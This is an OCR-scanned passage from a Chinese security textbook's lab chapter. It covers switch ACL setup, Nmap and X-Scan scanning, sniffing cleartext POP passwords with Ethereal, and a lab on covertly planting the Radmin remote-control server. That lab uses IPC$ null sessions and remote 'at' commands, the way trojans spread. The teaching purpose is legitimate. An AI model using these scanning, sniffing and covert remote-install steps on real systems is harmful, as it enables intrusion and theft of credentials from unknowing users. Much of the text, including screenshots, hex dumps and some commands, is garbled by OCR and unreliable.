S3550— 24(config)# interface vlan 10 

S3550 一 24(config- if)# ip add 192.168.10.1 255.255.255.0 

S3550 - 24(config - if)# no shutdown ! 配置 虚拟 接口 VLAN 10 的 地址 
S3550— 24(config— if)# exit 

S3550 - 24(config)# interface vlan 20 

S3550— 24(config— if)# ip add 192.168.20.1 255.255.255.0 

53550 — 24(config— if)# no shutdown ! 配置 虚拟 接口 VLAN 20 的 IP 地 址 
S3550 - 24(config— if)# ex 让 
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S3550 - 24(config)# interface vlan 30 

S3550 -24(config- if)# ip add 192.168.30.1 255.255.255.0 

53550 — 24(config- if)# no shutdown ! 配置 虚拟 接口 VLAN 30 的 IP 地 址 
S3550— 24(config— if)# exit 


3. 配置 访问 控制 列表 


S3550 — 24(config) # ip access - list extended denystudentwww 


! 定义 扩展 的 访问 控制 列表 ,并 取 名 为 "denystudentwww" 
S3550 — 24 (config - ext - nacl) # deny tcp 192. 168. 30. 0 0. 0. 0. 255 192. 168. 10. 0 0. 0. 0. 255 
eq WWW 
! 禁 止 网 络 192. 168. 30.0 访问 网 络 192.168.10.0 的 WWW 服务 
S3550 - 24(config - ext - nacl)# permit ip any any ! 允许 其 他 服务 


4. 把 定义 的 访问 控制 列表 应 用 到 虚拟 接口 vlan 30 


S3550 — 24(config) # interface vlan 30 


S3550 - 24(config - if)# ip access - group denystudentwww in 
! 当 有 数据 包 进 入 vlan30 时 ,应 用 访问 控制 列表 


1533 思考 题 


1. 标准 访问 控制 列表 和 扩展 访问 控制 列表 有 什么 区 别 ? 
2. 为 什么 在 deny 某 个 网 段 后 ,还 要 permit 其 他 网 段 ? 


154 网 络 扫 描 实践 
154.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 


通过 该 实验 ,了 解 网 络 扫描 的 作用 ,掌握 主机 漏洞 扫描 `、 端 口 扫描 、 操 作 系统 类 型 扫描 软 
件 的 使 用 的 方法 ,能够 通过 网 络 扫描 发 现 对 方 的 信息 和 是 否 存在 漏洞 。 要 求 能 够 综合 使 用 
以 上 的 方法 来 获取 目标 主机 的 信息 。 


2. 实验 环境 


硬件 : 主流 配置 计算 机 , 连 和 局域网。 
软件 : 安装 Windows 2000/2003/XP 操作 系统 ,扫描 软件 X-Scan 3. 3 版 .Nmap 和 WinPcap。 


3. 背景 知识 


网 络 扫描 是 对 整个 目标 网 络 或 单 台 主机 进行 全 面 \ 快 速 、 准 确 的 获取 信息 的 必要 手段 。 
通过 网 络 扫描 发 现 对 方 , 获 取 对 方 的 信息 是 进行 网 络 攻防 的 前 提 。 通 过 该 实验 了 解 网 络 扫 
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描 的 内 容 , 通 过 端口 扫描 发 现 目标 主机 的 开放 端口 和 服务 ,通过 主机 漏洞 扫描 发 现 目 标 主机 
存在 的 漏洞 ,通过 操作 系统 类 型 扫描 判断 目标 主机 的 操作 系统 类 型 。 

一 次 完整 的 网 络 安全 扫描 分 为 三 个 阶段 。 

第 一 阶段 : 发 现 目 标 主机 或 网 络 。 

第 二 阶段 : 发 现 目标 后 进一步 搜集 目标 信息 ,包括 操作 系统 类 型 .运行 的 服务 以 及 服务 
软件 的 版 本 等 。 如 果 目 标 是 一 个 网 络 ,还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 .路 由 设备 以 及 
各 主机 信息 。 

第 三 阶段 : 根据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 

在 本 次 实验 中 使 用 到 的 工具 是 X-Scan 和 Nmap。 可 以 通过 安全 焦点 网 站 (http:// 
www. xfocus. net/) 下 载 。 

X-Scan 是 国内 非常 著名 的 一 款 扫描 工具 ,采用 多 线程 方式 对 指定 IP 地 址 段 (或 单机 ) 
进行 安全 漏洞 检测 ,支持 插件 功能 ,提供 了 图 形 界面 和 命令 行 两 种 操作 方式 ,扫描 内 容 包 括 : 
远程 操作 系统 类 型 及 版 本 ,标准 端口 状态 及 端口 BANNER 信息 ,CGI 漏洞 ,IIS 漏洞 , RPC 
漏洞 , SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER 能 
口令 用 户 ,NT 服务 器 NETBIOS 信息 等 。 扫 描 结果 保存 在 /log/ 目 录 中 ,index_*.htm 为 
扫描 结果 索引 文件 。 

Nmap 的 官方 网 站 为 http://nmap. org/。 它 也 是 一 个 网 络 探测 和 安全 扫描 程序 ,通过 
命令 行使 用 。 系 统管 理 者 和 个 人 可 以 使 用 这 个 软件 扫描 大 型 的 网 络 ,获取 那 台 主 机 正在 运 
行 以 及 提供 什么 服务 等 信息 。 支 持 很 多 扫描 技术 。 还 提供 了 一 些 高 级 的 特征 ,例如 ,通过 
TCP/IP 协议 栈 特征 探测 操作 系统 类 型 ,秘密 扫描 ,动态 延 时 和 重 传 计算 ,并 行 扫描 ,通过 并 
行 ping 扫描 探测 关闭 的 主机 ,诱饵 扫描 , 避 开 端口 过 滤 检 测 ,直接 RPC 扫描 ,碎片 扫描 ,以 
及 灵活 的 目标 和 端口 设 定 。 


1542 实验 步骤 


使 用 X-Scan 和 Nmap 实现 目标 主机 的 端口 扫描 、 漏 洞 扫描 、 操 作 系 统 扫 描 。 
(1) 打开 X-Scan, 如 图 15-33 所 示 。 


XScan v3.3 GU 
文件 (W 设置 (w) 查看 &) 工具 lenguage 村 且 Z) 
© Pu 四 国 直 

普通 信息 | 漏洞 信息 | 错误 信息 | 


| -scan-v3.3 使 用 说 明 


[| 一， 系统 要 求 : Windows WT/2000/xP/2003 
如 沦 上 可 运行 于 tindors 呆 系 列 折 作 系统 ,推荐 运行 于 Wintovs 2000| 上 的 server 版 indors 系 统 . 


= 功能 简介 : 


a 
人 er 


a 
” 浊 代 翅 、X-Scan| 你 亢 二 参与 本 疾 作 的 前 长 
na 


I 


起 


15-33 X-Scan 主 界面 


第 15 章 ”信息 安全 实验 
287 


(2) 单 击 “ 设 置 一 扫描 参数 ”, 弹 出 扫描 参数 设置 对 话 框 (如 图 15-34 所 示 ) ,在 “指定 IP 
范围 "输入 被 扫描 的 IP 地址 或 地 址 范围 。 在 “全 局 设置 ”的 “扫描 模块 "设置 对 话 框 中 选择 需 
要 检测 的 模块 。 其 他 可 以 使 用 默认 的 设置 ,也 可 以 根据 实际 需要 进行 选择 。 最 后 单 击 “ 确 
定 ” 回 到 主 界面 。 


C6 
字典 文件 设置 


图 15-34 设置 扫描 参数 


(3) 在 主 界面 单 击 绿色 箭头 开始 对 目标 主机 或 目标 网 络 的 扫描 。 不 久 , 就 可 以 得 到 目 
标 主机 的 扫描 结果 ,从 分 析 报 告 中 可 以 看 到 有 关 目 标 主 机 开放 端口 和 服务 的 详细 报告 (如 
图 15-35 所 示 ) 。 

(4) Nmap 软件 的 使 用 。 首 先 安装 WinPcap 驱动 ,然后 将 Namp 扫描 软件 复制 到 硬盘 
分 区 ,在 系统 命令 提示 符 下 进入 Nmap 目录 ,使 用 命令 nmap-h 可 以 查看 nmap 命令 的 所 有 
参数 及 描述 。Nmap 的 语法 相当 简单 ,Nmap 的 不 同 选项 和 -s 标志 组 成 了 不 同 的 扫描 类 型 ， 
比如 一 个 Ping 扫描 命令 就 是 -sP。 在 确定 了 目标 主机 和 网 络 之 后 , 即 可 进行 扫描 。 

(5) 使 用 如 下 命令 扫描 目标 主机 的 操作 系统 : nmap -O 192. 168. 10. 100, 扫 描 结果 如 
图 15-36 所 示 。 从 中 可 以 看 到 目标 主机 的 开放 端口 及 操作 系统 类 型 。 

(6) Nmap 其 他 的 一 些 扫描 例子 : 

nmap - v 192.168.10.100 // 扫 描 主 机 192.168. 10.100 的 所 有 TCP 端口 。- v 打开 宛 余 模 式 

nmap - sS -0 192.168.10.100/24 // 发 起 对 192.168.10.100 所 在 网 络 上 的 所 有 255 个 IP 地 址 的 秘 

密 SYN 扫描 。 同 时 还 探测 每 台 主 机 操作 系统 的 指纹 特征 

nmap -Vv -randomize_hosts -p80 *.*.2.3-5// 只 扫描 指定 的 IP 范围 ,有 时 用 于 对 这 个 


Internet 进行 取样 分 析 。nmap 将 寻找 Internet 上 所 有 后 两 个 字 节 是 .2.3、.2.4、.2.5 的 IP 地 址 上 
的 Web 服务 器 


(7) 每 两 个 用 户 一 组 ,互相 设置 如 下 不 同 的 条 件 进 行 扫描 。 

要 求 : 扫描 操作 系统 的 类 型 ; 四 扫描 开放 端口 及 服务 ; 加 尝试 发 现 开 放 服 务 是 否 存 
在 漏洞 及 描述 ; 由 在 对 方 网 络 存在 防火 墙 的 情况 下 如 何 发 现 内 部 主机 及 开放 服务 (提示 : 
利用 Nmap 的 高 级 扫描 功能 ); 加 根据 扫描 结果 给 出 评估 结果 ,并 提出 进一步 的 入侵 设想 或 
修复 设想 。 
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2008-8-14 17;58;02 - 2008-8-14 18:02:28 


检测 结果 
存活 主机 1 
漏洞 数量 2 
区 此 数量 3 
提示 数量 26 

主机 列表 
主机 检测 结果 
localhost 发 现 安全 漏洞 
[返回 项 部 ] 

主机 分 析 : localhost 
主机 地 址 端口 /服务 服务 漏洞 
localhost network blackjack (10: 发 现 安全 提示 
localhost microsoft-ds (445/tcp) 发 现 安全 漏洞 
localhost imap (143/tcp) 发 现 安全 提示 
localhost 50CK5 (1080jtcp) 发 现 安全 哥 示 
localhost POP3-ssl (995/tcp) 发 现 安全 提示 
localhost pop3 (110/tcp) 发 现 安全 提 
localhost https (443/tcp) 发 现 安全 提示 
localhost NNTP-ss| (5 发 现 安全 提示 
localhost HTTI 发 现 安全 提示 
localhost http 发 现 安全 提示 
localhost SMTP-ss| (465 发 现 安全 提示 
localhost smtp (25/tcp) 发 现 安全 提示 
localhost unknown 发 现 安全 提示 
localhost 发 现 安全 提示 
目 先 毕 


扫描 结果 报告 


linteresting ports on 192.168.18.188: 
INot shoun: 1671 closed ports 
STATE SERVICE 
open sntp 
open http 
open morpe 
open netbios-ssn 
open https 
open NF8-or-IIS 
open “LSR-or-ntern 
open [IS 
3372/tcp open madte 
nnc Address: 98:6C:23:68:E8:2D《UMHvazre) 
Deuice type: general purpose 
Running: Microsoft Vindows 95/98/MEINT/2H/XP 
IOS details: Microsoft Windows Hillenniun Edition (Me), Windows 2808 Professionall 
or Advanced Server, or Windows XP, Microsoft Windows XP SF1 


INnap finished: 1 IP address 《1 host up》 scanned in 17.844 seconds 


图 15-36 ”Nmap 扫描 结果 


154.3 思考 题 


1. 安装 Nmap 为 什么 要 先 安装 WinPcap? 
2. 如 何 欺骗 对 方 的 扫描 活动 ,使 之 得 不 到 正确 的 结果 ? 


155 网 络 侦 听 及 协议 分 析 
1551 实验 目的 ,环境 及 背景 知识 


1. 实验 目的 


了 解 网 络 侦 听 的 目的 .过程 以 及 基本 手段 。 对 协议 分 析 有 基本 了 解 。 学 会 使 用 
Ethereal 工具 ,为 进一步 学 习 基 于 网 络 的 入侵 检测 系统 打下 基础 。 


2. 实验 环境 


硬件 : 主流 配置 计算 机 ,连接 入 Internet。 
软件 : 安装 Windows 2000/2003/XP 操作 系统 ,安装 Outlook。 


3. 背景 知识 


网 络 侦 听 也 称 为 网 络 嗅 探 ,是 一 项 很 重要 的 技术 ,提供 给 网 络 安全 管理 人 员 用 来 监视 网 
络 的 状态 .数据 流动 情况 以 及 网 络 上 传输 的 信息 等 。 同 时 它 也 是 基于 网 络 人 侵 检测 的 基础 ， 
NIDS 的 数据 来 源 就 是 通过 网 络 侦 听 得 到 的 。 

当 信息 以 明文 的 形式 在 网 络 上 传输 时 ,使 用 侦 听 技术 并 不 是 一 件 难事 ,在 共享 型 局 域 网 
中 ,只 要 将 网 络 接口 设置 成 混杂 模式 , 便 可 以 源源 不 断 地 将 网 上 传输 的 信息 截获 。 网 络 侦 听 
可 以 在 网 上 的 任何 一 个 位 置 实施 ,如 局 域 网 中 的 一 台 主 机 、 网 关上 或 远程 网 的 调制 解 调 器 之 
间 等 。 

Ethereal 是 一 个 在 网 络 上 侦 听 数据 包 , 并 且 进 行 分 析 的 工具 ,此 类 工具 被 称 为 嗅 探 器 
(sniffer) ,网 络 管理 员 使 用 它 来 协助 解决 网 络 问题 ,网 络 安全 工程 师 用 它 来 测试 安全 问题 ， 
开发 人 员 用 它 可 以 调试 协议 的 实现 过 程 ,用 它 还 可 以 深入 地 学 习 网 络 协议 。 

Ethereal 是 目前 最 好 的 开源 网 络 分 析 工 具 , 其 官方 网 站 为 http://www. ethereal. com/， 
原先 只 有 Linux 下 可 用 ,现在 已 有 Windows 可 用 版 本 。 

它 的 安装 过 程 比 较 简单 ,过 程 中 会 默认 安装 WinPcap ,按照 默认 设置 即 可 ,完毕 后 执行 
程序 , 主 界面 如 图 15-37 所 示 。 此 时 还 没有 开始 捕获 数据 ,所 以 主 界面 中 无 任何 分 析 数 据 。 

单 击 capture-start, 即 可 开始 抓 取 数据 包 。 当 有 数据 流量 时 ,界面 相应 的 协议 栏 中 会 显 
示 数 据 包 的 个 数 和 所 占 百分比 (如 图 15-38 所 示 )。 

按 Stop 可 以 停止 抓 取 ,在 主 界面 会 显示 具体 捕获 的 数据 包 内 容 , 如 图 15-39 所 示 。 

第 一 层 界面 中 显示 的 是 抓 取 到 的 所 有 数据 包 列表 ,从 纵向 看 分 为 五 栏 。 在 其 中 的 
source 和 destination 栏 , 可 以 看 到 通信 双方 的 地 址 ,Protocol 栏 显示 出 使 用 的 协议 。Info 栏 
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Ekar| 


发 帮凶 和 仙 亿 | 已 国 x 匈 昌国 4 史 色 下 和 | 国 


国 |@ & 
v Expression.. Cear apply 


图 15-38 数据 捕获 窗口 
显示 数据 包 的 基本 信息 。 例 如 下 面 显示 的 是 登录 www. baidu. com 和 远程 地 址 进行 TCP 
三 次 握手 的 过 程 。 

192.168.1.100 

220.181.6.6 


220.181.6.6 
192.168.1.100 


TCP 2390 > http [SYN] Seq=0 Ack=0 win=65535 Len=0 MSS=1460 
192.168.1.100 TCP http > 2390 [SYN, ACK] Seq=0 Ack=1 win=2920 Len=0 MSS=1440 
220.181.6.6 TCP 2390 > http [ACK] seq=1 Ack=1 win=65535 Len=0 


任意 选择 一 个 数据 包 , 可 以 得 到 详细 信息 数据 包头 部 分 析 。 读 者 可 以 结合 在 计算 机 网 
络 中 学 习 到 的 有 关 TCP/IP 数据 包头 的 知识 来 解读 。 
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革 表 外 久 他 | 巴 日 x 色 台 国 和 本 寺 二 固 量 @QR 同 车 加 图 义 | 加 


Eler ” Epression.. Ce Apply 


No, Destination Protocol nf 


3 yp 
Standard query response A 66.40.33.130 


030585 。。 202.103 
.745013 192.1 
746944 


-65429 Len=0 


SFrame 1 (79 bytes on wire, 79 bytes captured) 
Arrival Time: Apr 20, 2008 10:24:14.55 
[Time delta from previous pa 


nd: 
[Time since reference or f fi 5 s 
Frame Number; 1 数据 包 具体 信息 
Packer Lengt 5 
capture Length t 
3 (CO! 


63), Dst: 00:1d:0f:77:21:a8 (00:1d:0F:77:21:a8) 


Type: IP COxI800) 


5 Internet protocol, src: 192.168.1.100 (192.168.1.100), Dst: 202.103.24.68 (202.103.24.68) R 
1on: 4 


engtil: 20 bytes 
rentiated Services Field: Ox00 (Dscp Ox00: Default; ECN: 


区 ji 和 T 天 浊 册 表示 的 评 届 数 据 内 容 
i 


图 15-39 数据 包 及 其 协议 分 析 结 果 


:65 
: Oxd589 (54665) 


7 HI 63 08 00 4 00 
0 6a c0 a8 01 64 ca 67 
3 0 00 00 01 


的 形式 ,在 过 


当 数 据 包 非 常 多 的 时 候 , 需 要 查找 某 种 特定 类 型 的 数据 包 , 可 以 采用 过 
滤 栏 里 填 人 关键 词 , 则 可 以 非常 方便 地 进行 过 滤 

另外 ,Ethereal 只 能 在 总 线 型 局 域 网 中 捕获 网 络 中 的 全 部 信 
口 镜像 才能 捕获 全 部 信息 ,否则 只 能 捕获 本 地 计算 机 的 网 络 信息 。 


,在 交换 网 络 下 需要 做 端 


1552 实验 步骤 


1. Ping 数据 包 分 析 
Ping 程序 使 用 的 是 ICMP 报 文 格式 ,打开 Ethereal 的 捕获 按钮 ,然后 在 计算 机 的 运行 
框 中 输入 : Ping 192. 168. 1.1(IP 地 址 根据 网 络 环境 不 同 而 自行 确定 ) ,如 图 15-40 所 示 。 


[oD 


icrosoft Windows XP [ 豚 本 5.1.2688] 
KC》 版 权 所 有 1985-2881 Microsoft Corp- 


:\Docunents and Settings ?ping 192.168.1.1 
Pinging 192.168.1.1 with 32 bytes of data: 


bytes=32 tineCims TIL=64 


Reply from 192.168.1 
bytes=32 tine<lns ITIL=64 


ply from 192.168.1 


1 
区 

Reply from 192.168.1.1: bytes=32 tine<lms TIL-64 
“ls 


Reply fron 192.168.1.1: bytes=32 tineCims TIL=64 
Ping statistics for 192-168-1-1: 

Packets: Sent = 4, Received = 4, Lost = 8 CBx loss), 
Approxinate round trip tines in milli-seconds: 

Minimun = Bns, Maxinun = Bns, fAverage = Bns 


:\Docunents and Settings 


| 


15-40 发 送 Ping 包 
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等 获得 主机 回应 后 关闭 捕获 , 回 到 主 界面 观察 获取 的 数据 包 信息 (如 图 15-41 所 示 )。 


Ee Edk Wow Go capture analyze Statites tp 
A 国 QQQ@Q 昌 靖国 国 关 | 加 


了 eo er 
192.168.1.100 .68. ICMP Echo (ping) request 
392.468,1:1" io emp Re -一 - reply 
192.168.1.100 192.168. 


ICMP request 
ICNP Ee Bin) reply 
ICMP 


192 100 r 
192.168.1.1 和 


Frame 1 C74 bytes on WHr， 
日 ECherner II, Src: Benq_7’ 

Destination: 00:1d:0F: 
Source: Benq_73 


Dst: 00:1d:0f:77:21:a8 (00:1d:0f:77:21:a8) 


Header lengtn: 20 bytes 

Dtf ferene iared Services Fe1d; 0x00 (pscP Ox00: Default; ECN: oxo0) 
Toral Length: 6 
Tactf an oxdasf C55871) 

BFlays: Ox00 
Fragment offset; 0 
Time to 1ive: 128 
Protoco1: ICMP (Ox01) 

田 Header checksum: Oxdccb [correcr] 
Source: 192.168.1.100 《192.168.1.1007 
Destination: 192.168.1.1 (192.168.1.1) 

EW Tnternet Control Message Protocol R 


Uo 
D0 00 HOO 


29 
9939 品名 869 63 6b 65 64 8e 6f 70 71 72 73 74 73 76 ghijkian st 
0040 77 61 62 63 64 65 66 67 68 69 wabcdefg h 


Premet Protocol tp), Zobtes [Pr 6 Dr MODrops: o 


15-41 对 数据 包 进 行 协议 分 析 


可 以 看 到 发 送 了 四 个 请 求 , 对 应 了 四 个 回应 ,任意 选择 一 个 数据 包 ， 
里 面 有 三 段 有 效 内 容 , 即 Ethernet 帧 首部 分 析 、IP 包 首部 分 析 和 ICMP 首部 分 析 。 例 

如 ICMP 首部 内 容 如 图 I 所 示 ” S Internet Contro] Message Protoco1 
其 中 ,Type: 8 Code: 0 表明 ICMP 报 文 类 型 ,根据 协 Dee: 0 Fhe Pn aquess) 


Checksum: 0x445c [correct] 


议 规定 ,类 型 8 代码 0 即 为 Ping 的 Echo Request 报 文 。 sentiflers px0200 
Checksum 为 校 验 和 ,Identifier 可 理解 为 一 个 Ping 包 的 ID > we 

号 。Sequence 为 序列 号 段 。Data 为 Ping 中 所 发 数据 内 容 。 图 15-42 ICMP 首部 信息 
在 Windows 中 ,默认 的 填充 内 容 如 图 15-43 所 示 被 选中 的 


内 容 。 


本 
010 003c da 3f 00 00 80 


b 6c 6d & 
1 61 62 53 4 65 56 


15-43 ”Ping 包 中 的 填充 内 容 


需要 注意 的 是 ,Windows 和 Linux 操作 系统 所 发 出 的 Ping 包 中 的 Identifier 值 和 填充 
值 有 所 不 同 ,Windows 的 Identifier 值 一 般 为 0x0200, 而 Linux 的 Identifier 和 填充 内 容 没 
有 固定 规律 。 由 此 可 以 初步 判断 远程 机 器 的 操作 系统 类 型 。 
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2. 邮件 密码 嗅 探 


下 面 我 们 用 Ethereal 来 截获 用 户 的 邮箱 密码 。 邮 件 接 收 过 程 采用 Outlook express。 
打开 Ethereal 和 Outlook express, 填 人 邮箱 用 户 名 和 密码 , 单 击 “ 确 定 ” 准 备 接收 邮件 。 观 
察 Ethereal 捕获 到 的 结果 ,获取 到 的 数据 包 比 较 多 ,包括 了 大 量 TCP 包 , 我 们 采用 过 滤 的 方 
法 只 留 下 POP 协议 类 数据 包 ( 如 图 15-44 所 示 )。 


Ble Edt Vew Go Capture Anayee Skatistcs Holp 


苇 官 好人 鲁 制 祈 唱 x 名 吕 罗 中富 旦 


pn > Bpressen., Ces appy 


PASS justatest 
+OK Xiongpin301621cn. com has 1 messages (15378 octets) 


59. 36, 
192,165.1,100 
59,36,102,42 
192 00 


STAT 
+0K 1 15378 


25 11. 598240 
26 11. 598563 POP 。 Request: LIST 
27 11.781562 POP Response: +OK 1 15378 


29 12.103595 
30 12.107353 


31 12.294256 
32 12.299327 


Gortnuarton, 


WFrame TI 《9T bytes on wire, S15 
a Ethernet 11, src: 192,168,1.1 
Destination: 192.168. 


Source: 192.168.1.1 (i 
Type: IP (0x800) 
日 Ineerner prorocol, Src: 59.36.102.42 (59.36.102.42), Dst: 192.168.1.100 (192.168.1.100) 中 
Version: 4 
Header 1engtn: 20 byres 
Differentiated Services Fie1d: 0x00 (Dscp Ox00: Default; EcN: Ox00) 
7 


Flags: Ox04 CDon't Fragment) 
Fragment offset: 0 加 


5005 00 03 5q 73 5165 00 Idq of 77 ZI a5 05 00 45 00 
0010 00 4d 15 be 40 00 36 06 ct 94 3b 24 66 2a cO aB 
0020 ol 64 00 ie 0a 87 1f 30 ac a8 cd 6¢ 12 51 50 18 
0030 165 d0 42 ’ 00 00 2b 4f 4t 20 48 65 72 6d 65 73 ~.B. 
949 a0 5947 5929 72 05 72 26 69 63 65 20 28 29 20 

0050 69 73 20 72 55 61 64 79 2€ 0d 0a 427e 


For COCME IRA OCALS [P61 Dr 31 WE 


图 15-44 ”截获 信息 


在 截获 的 所 有 数据 包 当 中 ,我 们 发 现 了 感 兴趣 的 内 容 


POP Request : USER xiongping01 

POP Response: +OK 

POP Request : PASS justatest 

POP Response: +OK xiongping016@21cn.com has 1 messages (15378 octets) 


第 一 个 数据 包 的 具体 信息 如 下 


Post office Protoco1 
日 +0K Hermes POP service () is ready.NrNn 
Response: +OK 
Response Arg: Hermes POP service () is ready. 


表示 服务 器 已 经 连接 成 功 ,准备 接受 用 户 名 和 密码 了 。 
接着 的 两 个 数据 包 就 是 输入 的 用 户 名 和 密码 


下 Post office Protoco1 日 Post Ottice Protocol 
晶 USER xiongping0lNrNn 日 PASS justatestNrNn 
Request: USER Request: PASS 


Request Arg: xiongping01 Request Arg: justatest 
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可 以 看 到 ,以 明文 形式 传送 的 信息 是 不 安全 的 。 一 些 敏 感 信 息 应 该 经 过 加 密 后 传送 。 
15.53 思考 题 


1. 与 POP 协议 类 似 ,TELNET 协议 .FTP 协议 中 对 用 户 名 和 密码 等 信息 也 没有 加 密 ， 
请 读者 参照 POP 协议 的 分 析 方 式 , 对 TELNET、FTP 中 的 密码 进行 嗅 探 和 分 析 。 

2. 观察 一 下 Ethereal 在 什么 样 的 网 络 环境 下 可 以 捕获 整个 网 络 中 传输 的 内 容 , 在 什么 
样 的 网 络 环境 下 捕获 不 到 ,或 者 只 能 捕获 本 机 传输 的 内 容 。 

3. Ethereal 的 功能 非常 多 ,本 实验 中 只 使 用 了 其 基本 功能 ,关于 其 高 级 功能 可 以 通过 
阅读 用 户 手 册 来 了 解 。 


156 远程 控制 及 漏洞 利用 
156.1 实验 目的 、 环 境 及 背景 知识 


1. 实验 目的 


通过 该 实验 ,了 解 远程 控制 软件 和 木马 程序 的 区 别 。 认 识 木马 软件 的 危害 性 及 工作 原 
理 ,掌握 木马 程序 利用 漏洞 植 人 远程 计算 机 的 方法 .木马 的 控制 检测 和 清除 方法 。 


2. 实验 环境 


硬件 : 主流 配置 的 计算 机 , 连 入 局 域 网 。 
软件 : 安装 Windows 2000 操作 系统 ,Radmin 3.2 影子 版 。 


3. 背景 知识 


1) 远程 控制 软件 Radmin 

远程 控制 软件 一 般 方便 网 络 管理 员 远 程 管理 计算 机 。 但 如 果 用 于 网 络 攻击 , 则 远程 控 
制 软件 安装 在 被 控制 计算 机 上 形成 后 门 。 稍 加 伪装 ,就 是 我 们 常 听 说 的 “特洛伊 木马 ”, 极 具 
危害 性 。 

远程 控制 软件 和 可 以 实现 远程 控制 的 木马 程序 在 核心 代码 上 并 没有 区 别 ,都 采用 了 
客户 /服务 器 端的 模式 进行 操作 。 在 被 控制 机 器 上 安装 服务 器 端 ,在 控制 者 的 机 器 上 安装 客 
户 端 用 来 连接 远程 计算 机 。 区 别 在 于 攻击 者 如 果 把 这 些 工具 伪装 成 某 些 其 他 良性 程序 时 ， 
它们 才能 被 称 为 木马 。 并 且 ,合法 的 远程 控制 软件 在 服务 器 端 都 会 显示 图 标 或 者 以 某 种 方 
式 表示 自己 的 存在 ,而 木马 软件 却 想方设法 地 隐藏 自己 的 存在 。 

实验 所 使 用 的 远程 控制 软件 Radmin 本 身 不 是 木马 ,而 是 一 个 公开 ,合法 发 行 的 远程 控 
制 软件 , 它 的 官方 网 站 是 http://www. radmin. com/ 。Radmin 的 服务 器 端 应 该 按照 正常 操 
作 程 序 合 法 复制 到 对 方 计算 机 上 。 但 在 实验 中 ,给 出 了 另外 一 种 利用 IPC $ 漏洞 远程 安装 
的 方式 ,这 也 是 木马 复制 自己 的 一 种 方式 。 

2) IPC$ 共享 

IPC $ (Internet Process Connection) 是 共享 “命名 管道 ”的 资源 , 它 是 为 了 让 进程 间 通 


信 而 开放 的 命名 管道 ,可 以 通过 验证 用 户 名 和 密码 获得 相应 的 权限 ,在 远程 管理 计算 机 和 查 
看 计算 机 的 共享 资源 时 使 用 。 

利用 IPC $ ,连接 者 甚至 可 以 与 目标 主机 建立 一 个 空 的 连接 而 无 需 用 户 名 与 密码 ( 当 
然 , 对 方 机 器 必须 开 了 IPC $ 共享 ,否则 无 法 连接 ), 而 利用 这 个 空 的 连接 ,连接 者 还 可 以 得 
到 目标 主机 上 的 用 户 列表 。 进 一 步 ,如 果 拥 有 了 对 方 用 户 名 和 密码 , 则 可 以 建立 非 空 连接 ， 
建立 成 功 后 ,可 以 访问 对 方 所 有 的 逻辑 盘 , 包 括 C 盘 。 那 么 利用 这 种 方式 ,就 可 以 远程 把 文 
件 复制 到 对 方 机 器 上 ,并 且 使 用 at 命令 设置 在 特定 时 间 运 行 。 

其 实 ,IPC $ 并 不 是 真正 意义 上 的 漏洞 , 它 是 为 了 方便 管理 员 的 远程 管理 而 开放 的 远程 
网 络 登录 功能 ,而 且 还 打开 了 默认 共享 ,包括 所 有 的 逻辑 盘 (c$,d$,e$…) 和 系统 目录 
Winnt 或 Windows(admin $ )。 所 有 的 这 些 , 初 衷 都 是 为 了 方便 管理 员 的 管理 ,但 好 的 初 囊 
并 不 一 定 有 好 的 收效 ,IPCS$ 已 经 成 为 攻击 者 最 喜欢 使 用 的 漏洞 之 一 。 

目前 ,在 Windows XP 及 以 后 的 版 本 中 ,已 经 取消 了 IPCS$ 非 空 连接 的 权限 。 

3) 基本 命令 

实验 中 需要 用 到 的 几 个 命令 : 

(1) dir 

作用 : 显示 目录 文件 。 

格式 : 


dir [driver:][path]j[filename][…][ 各 种 参数 ] 
(2) copy 


作用 : 将 一 个 文件 从 一 个 位 置 复制 到 另外 一 个 位 置 。 注 意 ,不 能 复制 文件 夹 。 

格式 : 

copy [各 种 参数 ] source [参数 ] destination 

(3) at 

作用 : 制订 计划 ,以便 系统 按照 该 计划 在 指定 的 日 期 和 时 间 启 动 和 运行 计算 机 上 面 的 
命令 和 程序 。 只 能 在 计划 ”服务 运行 时 使 用 。 如 果 不 是 用 参数 , 则 列 出 已 计划 的 命令 。 

格式 : 


at [[\Ncomputername] hours:minutes command] 
at [\\computername] [{[ID][/delete]|/delete [/yes]}] 


实例 
at /* 显示 本 机 上 所 有 的 命令 计划 * / 
at \\office /* 显示 office 服务 器 上 已 计划 的 命令 列表 * / 


at \\IP 12:00 cmd /c "net start telnet" /x*12:00 在 某 IP 的 机 器 上 运行 telnet 服务 * / 

(4) net use 

作用 : 连接 至 共享 网 络 资源 ,显示 计算 机 连接 的 信息 ,并 控制 网 络 连 接 , 没 有 参数 时 , 检 
索 网 络 连接 列表 。 

格式 : 


net use 
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(5) Net start 
作用 : 启动 服务 。 使 用 不 带 参数 的 net start 时 ,显示 当前 服务 列表 。 
格式 : 


net start [service] 
实例 : 


net start /* 当前 服务 列表 * / 
net start telnet /x 打开 telnet 服务 * / 
net stop telnet /x 停止 telnet 服务 */ 


(6) Net time 
作用 : 显示 另外 一 台 计 算 机 的 时 间 。 
格式 : 


net time \\computername 
实例 : 


net time 
net time \\IP /set 


(7) telnet 
作用 : 使 用 telnet 协议 和 远程 计算 机 通信 。 对 方 机 器 必须 已 经 打开 了 telnet 服务 。 
格式 : 


telnet IP 


1562 实验 步骤 


1. 认识 Radmin 


Radmin 的 文件 夹 里 r_server. exe 和 AdmDIll. dll 为 服务 器 端 ,radmin. exe 为 客户 端 , 服 
务 器 端 复 制 到 受 控制 的 计算 机 中 ,客户 端 实验 者 自己 用 ,一 定 要 注意 这 个 顺序 ,不 能 弄 错 。 
使 用 Radmin 首要 的 任务 就 是 把 r_server. exe 和 AdmDll. dll 这 两 个 文件 复制 到 受 控 


计算 机 中 。 如 果 是 正常 使 用 ,可 以 利用 移动 硬盘 直接 复制 到 对 方 计算 机 。 然 后 单 击 安装 文 
件 ,直接 安装 。 

如 果 和 希望 远程 安装 而 不 被 对 方 知道 ,就 需要 使 用 到 下 一 步 ,IPC $ 连接 。 

2. IPC$ 连接 

首先 建立 空 连接 ,所 谓 空 连接 就 是 没有 用 户 名 和 密码 的 连接 。 

命令 : 


net use \\IPNIPCS$ "" /user:"" 


